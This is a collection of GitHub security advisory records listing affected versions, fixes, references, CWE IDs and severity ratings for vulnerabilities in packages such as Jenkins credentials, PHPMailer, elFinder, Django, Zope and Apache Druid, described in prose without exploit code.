[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.16'}, {'fixed': '2.3.19'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.15'}, {'fixed': '2.3.15.1'}]}], 'versions': ['2.3.15']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.14'}, {'fixed': '2.3.14.1'}]}], 'versions': ['2.3.14']}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.8'}, {'fixed': '2.3.13.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.1'}, {'fixed': '2.3.7.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21648'}, {'type': 'WEB', 'url': 'https://github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2021/21xxx/CVE-2021-21648.json'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/credentials-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2349'}]
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:18:23Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}
1.4.0
GHSA-m6gx-rhvj-fh52
2021-10-08T21:25:42Z
2021-06-29T21:13:54Z
null
[]
Denial of service in go-ethereum due to CVE-2020-28362
### Impact Versions of Geth built with Go `<1.15.5` or `<1.14.12` are most likely affected by a critical DoS-related security vulnerability. The golang team has registered the underlying flaw as ‘CVE-2020-28362’. We recommend all users to rebuild (ideally `v1.9.24`) with Go `1.15.5` or `1.14.12`, to avoid node crashes. Alternatively, if you are running binaries distributed via one of our official channels, we’re going to release `v1.9.24` ourselves built with Go `1.15.5`. ### Patches This is not an issue in go-ethereum, rebuilding an older version with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. ### Workarounds Rebuilding with Go `1.15.5` or `1.14.12` will suffice to address the vulnerability. ### References - https://blog.ethereum.org/2020/11/12/geth_security_release/ - https://groups.google.com/g/golang-announce/c/NpBGTTmKzpM ### For more information If you have any questions or comments about this advisory: * Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum) * Email us at [security@ethereum.org](mailto:security@ethereum.org)
[]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.24'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-m6gx-rhvj-fh52'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}]
{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T21:49:12Z', 'nvd_published_at': None}
1.4.0
GHSA-77mr-wc79-m8j3
2021-10-21T13:23:23Z
2021-06-22T15:18:02Z
null
['CVE-2021-3603']
A validation function with the same name as a built-in validator can be called
If a function is defined that has the same name as the default built-in email address validation scheme (`php`), it will be called in default configuration as when no validation scheme is provided, the default scheme's callable `php` was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling `validateAddress()`. ### Impact Low impact – exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway. ### Patches This is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break. ### Workarounds Inject your own email validator function. ### References Reported by [Vikrant Singh Chauhan](mailto:vi@hackberry.xyz) via [huntr.dev](https://www.huntr.dev/). [CVE-2021-3603](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603) ### For more information If you have any questions or comments about this advisory: * Open an issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer) * [Email us](mailto:phpmailer@synchromedia.co.uk).
[]
[{'package': {'ecosystem': 'Packagist', 'name': 'phpmailer/phpmailer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/security/advisories/GHSA-77mr-wc79-m8j3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3603'}, {'type': 'WEB', 'url': 'https://github.com/PHPMailer/PHPMailer/commit/45f3c18dc6a2de1cb1bf49b9b249a9ee36a5f7f3'}, {'type': 'PACKAGE', 'url': 'https://github.com/PHPMailer/PHPMailer'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603'}, {'type': 'WEB', 'url': 'https://www.huntr.dev/bounties/1-PHPMailer/PHPMailer/'}]
{'cwe_ids': ['CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T19:49:12Z', 'nvd_published_at': '2021-06-17T12:15:00Z'}
1.4.0
GHSA-f2rp-4rv7-fc95
2023-01-24T15:07:15Z
2021-06-10T15:54:43Z
null
['CVE-2021-20259']
Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox
A flaw was found in the Foreman project. The Proxmox compute resource exposes the password through the API to an authenticated local attacker with view_hosts permission. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. Versions of foreman_fog_proxmox prior to 0.13.1 are affected.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'foreman_fog_proxmox'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.13.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20259'}, {'type': 'WEB', 'url': 'https://github.com/theforeman/foreman_fog_proxmox/pull/184/commits/b7e910bf61563f5d447c71b1b41e2a373a794d7b'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1932144'}, {'type': 'PACKAGE', 'url': 'https://github.com/theforeman/foreman_fog_proxmox'}, {'type': 'WEB', 'url': 'https://github.com/theforeman/foreman_fog_proxmox/releases/tag/v0.13.1'}]
{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:58:17Z', 'nvd_published_at': '2021-06-07T21:15:00Z'}
1.4.0
GHSA-p2c4-gxp4-j3xp
2022-05-04T03:11:25Z
2021-06-21T17:11:25Z
null
['CVE-2021-34801']
Denial of service in Valine
Valine is a fast, simple & powerful comment system. Valine 1.4.14 allows remote attackers to cause a denial of service (application outage) by supplying a ua (aka User-Agent) value that only specifies the product and version.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'valine'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.14'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34801'}, {'type': 'WEB', 'url': 'https://github.com/xCss/Valine/issues/366'}, {'type': 'PACKAGE', 'url': 'https://github.com/xCss/Valine'}]
{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-17T18:44:36Z', 'nvd_published_at': '2021-06-16T15:15:00Z'}
1.4.0
GHSA-4hq8-gmxx-h6w9
2023-02-07T21:30:32Z
2021-06-23T17:29:42Z
null
['CVE-2020-27846']
XML Processing error in github.com/crewjam/saml
### Impact There are three vulnerabilities in the go `encoding/xml` package that can allow an attacker to forge part of a signed XML document. For details on this vulnerability see [xml-roundtrip-validator](https://github.com/mattermost/xml-roundtrip-validator) ### Patches In version 0.4.3, all XML input is validated prior to being parsed.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/crewjam/saml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/crewjam/saml/security/advisories/GHSA-4hq8-gmxx-h6w9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-27846'}, {'type': 'WEB', 'url': 'https://github.com/crewjam/saml/commit/da4f1a0612c0a8dd0452cf8b3c7a6518f6b4d053'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1907670'}, {'type': 'PACKAGE', 'url': 'https://github.com/crewjam/saml'}, {'type': 'WEB', 'url': 'https://grafana.com/blog/2020/12/17/grafana-6.7.5-7.2.3-and-7.3.6-released-with-important-security-fix-for-grafana-enterprise/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YUTKIRWT6TWU7DS6GF3EOANVQBFQZYI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICP3YRY2VUCNCF2VFUSK77ZMRIC77FEM/'}, {'type': 'WEB', 'url': 'https://mattermost.com/blog/coordinated-disclosure-go-xml-vulnerabilities/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0058'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210205-0002/'}]
{'cwe_ids': ['CWE-115', 'CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T20:54:26Z', 'nvd_published_at': None}
1.4.0
GHSA-378p-hrq3-x4p3
2021-05-28T18:49:50Z
2021-06-08T23:08:20Z
null
['CVE-2021-33562']
Cross-site scripting in Shopizer
A reflected cross-site scripting (XSS) vulnerability in Shopizer before 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.shopizer:shopizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.17.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33562'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/commit/197f8c78c8f673b957e41ca2c823afc654c19271'}, {'type': 'WEB', 'url': 'https://github.com/shopizer-ecommerce/shopizer/compare/2.16.0...2.17.0'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/49901'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-28T18:49:50Z', 'nvd_published_at': '2021-05-24T23:15:00Z'}
1.4.0
GHSA-wph3-44rj-92pr
2022-08-11T00:02:01Z
2021-06-16T17:04:29Z
null
['CVE-2021-32682']
elFinder before 2.1.59 contains multiple vulnerabilities leading to RCE
### Impact We recently fixed several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with the minimal configuration. ### Patches The issues were addressed in our last release, 2.1.59. ### Workarounds If you can't update to 2.1.59, make sure your connector is not exposed without authentication. ### Reference Further technical details will be disclosed on https://blog.sonarsource.com/tag/security after some time. ### For more information If you have any questions or comments about this advisory, you can contact: - The original reporters, by sending an email to vulnerability.research@sonarsource.com; - The maintainers, by opening an issue on this repository.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'studio-42/elfinder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.59'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-qm58-cvvm-c5qr'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32682'}, {'type': 'WEB', 'url': 'https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities/'}, {'type': 'PACKAGE', 'url': 'https://github.com/Studio-42/elFinder'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/164173/elFinder-Archive-Command-Injection.html'}]
{'cwe_ids': ['CWE-22', 'CWE-78', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-15T21:01:45Z', 'nvd_published_at': '2021-06-14T17:15:00Z'}
1.4.0
GHSA-82xf-8h9p-c6qj
2021-05-19T20:53:27Z
2021-06-22T15:23:45Z
null
['CVE-2020-23264']
Cross-Site Request Forgery in forkcms
Cross-site request forgery (CSRF) in Fork-CMS before 5.8.2 allow remote attackers to hijack the authentication of logged administrators.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'forkcms/forkcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.8.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23264'}, {'type': 'WEB', 'url': 'https://github.com/forkcms/forkcms/pull/3123'}]
{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T20:53:27Z', 'nvd_published_at': '2021-05-06T22:15:00Z'}
1.4.0
GHSA-9qq2-xhmc-h9qr
2022-04-25T20:20:41Z
2021-06-23T17:57:10Z
null
['CVE-2018-20321']
Access Control Bypass
An issue was discovered in Rancher 2 through 2.1.5. Any project member with access to the default namespace can mount the netes-default service account in a pod, and then use that pod to execute administrative privileged commands against the k8s cluster. This could be mitigated by isolating the default namespace in a separate project, where only cluster admins can be given permissions to access. As of 2018-12-20, this bug affected ALL clusters created or imported by Rancher.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/rancher/rancher'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.6'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20321'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/commit/6ea187fcc2309d5a7a14ed47de5688bf6573f448'}, {'type': 'WEB', 'url': 'https://forums.rancher.com/c/announcements'}, {'type': 'PACKAGE', 'url': 'https://github.com/rancher/rancher'}, {'type': 'WEB', 'url': 'https://github.com/rancher/rancher/releases/tag/v2.1.6'}, {'type': 'WEB', 'url': 'https://rancher.com/blog/2019/2019-01-29-explaining-security-vulnerabilities-addressed-in-rancher-v2-1-6-and-v2-0-11/'}]
{'cwe_ids': ['CWE-288', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T18:10:58Z', 'nvd_published_at': '2019-04-10T14:29:00Z'}
1.4.0
GHSA-v85c-hgq5-7pfw
2021-07-02T16:59:00Z
2021-06-29T18:26:05Z
null
['CVE-2021-23399']
Arbitrary Command Injection
This affects all versions of package wincred. If attacker-controlled user input is given to the getCredential function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'wincred'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23399'}, {'type': 'WEB', 'url': 'https://github.com/rolangom/wincred/blob/3fd39186ee32add9c12046cdccf2765d19565335/index.ts%23L20'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-WINCRED-1078538'}]
{'cwe_ids': ['CWE-20'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-29T17:20:39Z', 'nvd_published_at': '2021-06-28T08:15:00Z'}
1.4.0
GHSA-86r9-39j9-99wp
2021-05-20T16:54:50Z
2021-06-23T17:17:52Z
null
['CVE-2016-9121']
Elliptic Curve Key Disclosure in go-jose
go-jose before 1.0.4 suffers from an invalid curve attack for the ECDH-ES algorithm. When deriving a shared key using ECDH-ES for an encrypted message, go-jose neglected to check that the received public key on a message is on the same curve as the static private key of the receiver, thus making it vulnerable to an invalid curve attack.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'gopkg.in/square/go-jose.v1'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/square/go-jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2016-9121'}, {'type': 'WEB', 'url': 'https://github.com/square/go-jose/commit/c7581939a3656bb65e89d64da0a52364a33d2507'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/164590'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0010'}, {'type': 'WEB', 'url': 'https://www.openwall.com/lists/oss-security/2016/11/03/1'}]
{'cwe_ids': ['CWE-326'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T16:54:50Z', 'nvd_published_at': None}
1.4.0
GHSA-p99v-5w3c-jqq9
2023-09-05T13:14:51Z
2021-06-10T17:21:12Z
null
['CVE-2021-33571']
Django Access Control Bypass possibly leading to SSRF, RFI, and LFI attacks
In Django 2.2 before 2.2.24, 3.x before 3.1.12, and 3.2 before 3.2.4, URLValidator, validate_ipv4_address, and validate_ipv46_address do not prohibit leading zero characters in octal literals. This may allow a bypass of access control that is based on IP addresses. (validate_ipv4_address and validate_ipv46_address are unaffected with Python 3.9.5+..) .
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.24'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.12'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.2.0'}, {'fixed': '3.2.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33571'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/203d4ab9ebcd72fc4d6eb7398e66ed9e474e118e'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/9f75e2e562fa0c0482f3dde6fc7399a9070b4a3d'}, {'type': 'WEB', 'url': 'https://github.com/django/django/commit/f27c38ab5d90f68c9dd60cabef248a570c0be8fc'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/3.2/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/django-announce/c/sPyjSKMi8Eo'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/B4SQG2EAF4WCI2SLRL6XRDJ3RPK3ZRDV/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210727-0004/'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2021/jun/02/security-releases/'}]
{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-10T14:42:30Z', 'nvd_published_at': '2021-06-08T18:15:00Z'}
1.4.0
GHSA-xx8f-qf9f-5fgw
2023-09-11T15:00:57Z
2021-06-08T20:11:19Z
null
['CVE-2021-3007']
Remote code execution in zendframework and laminas-http
Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'zendframework/zendframework'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.0.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laminas/laminas-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.14.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3007'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/pull/48'}, {'type': 'WEB', 'url': 'https://github.com/Ling-Yizhou/zendframework3-/blob/main/zend%20framework3%20%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%20rce.md'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/commits/2.15.x/src/Response/Stream.php'}, {'type': 'WEB', 'url': 'https://github.com/laminas/laminas-http/releases/tag/2.14.2'}, {'type': 'WEB', 'url': 'https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/'}]
{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T18:11:15Z', 'nvd_published_at': '2021-01-04T03:15:00Z'}
1.4.0
GHSA-g39q-f4rm-85x4
2023-07-06T18:14:13Z
2021-06-08T20:10:37Z
null
['CVE-2021-20682']
OS Command Injection in baserCMS
baserCMS versions prior to 4.4.5 allows a remote attacker with an administrative privilege to execute arbitrary OS commands via upload of malicious plugins.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'baserproject/basercms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.5'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-20682'}, {'type': 'WEB', 'url': 'https://basercms.net/security/JVN64869876'}, {'type': 'WEB', 'url': 'https://jvn.jp/en/jp/JVN64869876/index.html'}]
{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T22:37:23Z', 'nvd_published_at': '2021-03-26T09:15:00Z'}
1.4.0
GHSA-5pr9-v234-jw36
2021-05-21T16:26:15Z
2021-06-18T18:44:01Z
null
[]
Remote Code Execution via traversal in TAL expressions
### Impact Most Python modules are not available for using in TAL expressions that you can add through-the-web, for example in Zope Page Templates. This restriction avoids file system access, for example via the 'os' module. But some of the untrusted modules are available indirectly through Python modules that are available for direct use. By default, you need to have the Manager role to add or edit Zope Page Templates through the web. Only sites that allow untrusted users to add/edit Zope Page Templates through the web are at risk. ### Patches The problem has been fixed in Zope 5.2 and 4.6. ### Workarounds A site administrator can restrict adding/editing Zope Page Templates through the web using the standard Zope user/role permission mechanisms. Untrusted users should not be assigned the Zope Manager role and adding/editing Zope Page Templates through the web should be restricted to trusted users only. ### For more information If you have any questions or comments about this advisory: * Open an issue in the [Zope issue tracker](https://github.com/zopefoundation/Zope/issues) * Email us at [security@plone.org](mailto:security@plone.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.6'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'Zope'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0'}, {'fixed': '5.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/zopefoundation/Zope/security/advisories/GHSA-5pr9-v234-jw36'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T16:26:15Z', 'nvd_published_at': None}
1.4.0
GHSA-c99r-67x4-whj6
2021-10-05T17:29:12Z
2021-06-28T16:56:07Z
null
['CVE-2021-33604']
Reflected cross-site scripting in development mode handler in Vaadin 14, 15-19
URL encoding error in development mode handler in `com.vaadin:flow-server` versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser. - https://vaadin.com/security/cve-2021-33604
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.6.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 14.6.1'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '19.0.9'}]}], 'database_specific': {'last_known_affected_version_range': '<= 19.0.8'}}]
[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-c99r-67x4-whj6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33604'}, {'type': 'WEB', 'url': 'https://github.com/vaadin/flow/pull/11099'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/flow/'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-33604'}]
{'cwe_ids': ['CWE-172'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-06-24T19:31:53Z', 'nvd_published_at': '2021-06-24T12:15:00Z'}
1.4.0
GHSA-jj4f-p7vv-j4v9
2022-06-06T18:06:44Z
2021-06-16T17:51:58Z
null
['CVE-2021-26919']
Arbitrary code execution in Apache Druid
Apache Druid allows users to read data from other database systems using JDBC. This functionality is to allow trusted users with the proper permissions to set up lookups or submit ingestion tasks. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Druid server processes. This issue was addressed in Apache Druid 0.20.2
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.druid:druid'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.20.2'}]}]}]
